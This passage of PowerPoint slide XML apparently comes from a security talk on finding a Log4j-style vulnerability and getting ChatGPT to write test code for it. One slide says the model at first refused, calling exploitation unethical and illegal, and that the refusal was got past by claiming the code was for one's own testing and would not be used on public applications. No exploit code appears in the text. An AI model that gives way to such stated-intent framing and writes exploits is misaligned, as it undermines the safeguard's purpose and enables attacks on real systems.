        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1072946988"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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53E4816-CACA-74C3-BB47-DC317547533F}"/>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CDCC144C-7C59-A93D-CB15-DCDB5AF114A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DB90E68-573E-CA97-E37A-C744E6561CE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Let’s write an exploit for that! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C3AE304-B9E3-9088-BB93-06AF79681494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="1054962"/>
            <a:ext cx="3556000" cy="5245100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{074EC96C-23E0-ACDD-3014-101A763C84B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499172" y="1408014"/>
            <a:ext cx="6846746" cy="4503797"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>First find out how to identify it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-DE" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Dependency Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>ime consuming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Easy for a developer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Tough for a security team member</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-DE" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Scanning tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Of course they exist today</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Assume this is a brand new vulnerability and they don’t exists yet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>We may need to write the scanning tool ourselves 😏</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-DE" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Manual Inspection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>eally?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>How many applications do you have to do that for?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2888672349"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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36404FA-AA91-BFF1-FFD9-37C9B82360DA}"/>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E8D35022-1481-D827-AFD3-BBF94CA4E15F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D3DACC0-0655-C681-EC37-136345341AA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Convince ChatGPT to do it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE5E2EDA-AD0D-9627-9C64-623AB35F4749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="1207362"/>
            <a:ext cx="3810000" cy="4940300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62C9E3E8-30B1-BA87-1F87-3EFBDB78FCBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4539632" y="1207362"/>
            <a:ext cx="7031980" cy="3016210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>NO CONVICING NEEDED ANYMORE 😱</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When tested initally ChatGPT didn’t want to write the code for me!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Exploiting vulnerabilities is unethical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Exploiting vulnerabilities is illegal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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You had to explain </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>this is for your own testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>ou want to be secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>you will not use it to exploit public applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E5C66E7-6D01-0AE7-AF45-5C92A30B18A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4539632" y="4618529"/>
            <a:ext cx="6975336" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Caution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Legal and Ethical Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Only use this tool on systems you own or have explicit permission to test. Unauthorized testing can be illegal and unethical.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: If the payload triggers an LDAP lookup to your test server, it indicates a potential vulnerability. Ensure to patch the Log4j library in the affected application.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1501664897"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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38CC728-E4FA-16D9-19C5-F785050EB07A}"/>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8602ECD6-1D7B-07C2-CAB6-0965134A55E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C18A535D-1C5B-1E78-8BA4-D4B74B3E0A62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>What do I do with the code?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D93C15C6-248B-DD82-BDE8-4FE782D4A605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="1150212"/>
            <a:ext cx="3175000" cy="5054600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EEA76A7-D11A-066C-E9E5-14A1E45D4206}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3870871" y="1150212"/>
            <a:ext cx="4506362" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Semibold" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Great, now I have code to test the vulnerability!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5EB025D-2E76-BB6D-8ECF-989611DD75DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3870871" y="1670836"/>
            <a:ext cx="5135564" cy="1765984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{100BA0C3-B916-0FB8-C313-EA4E34313F2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3870871" y="3618890"/>
            <a:ext cx="7261924" cy="2421176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" numCol="1" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
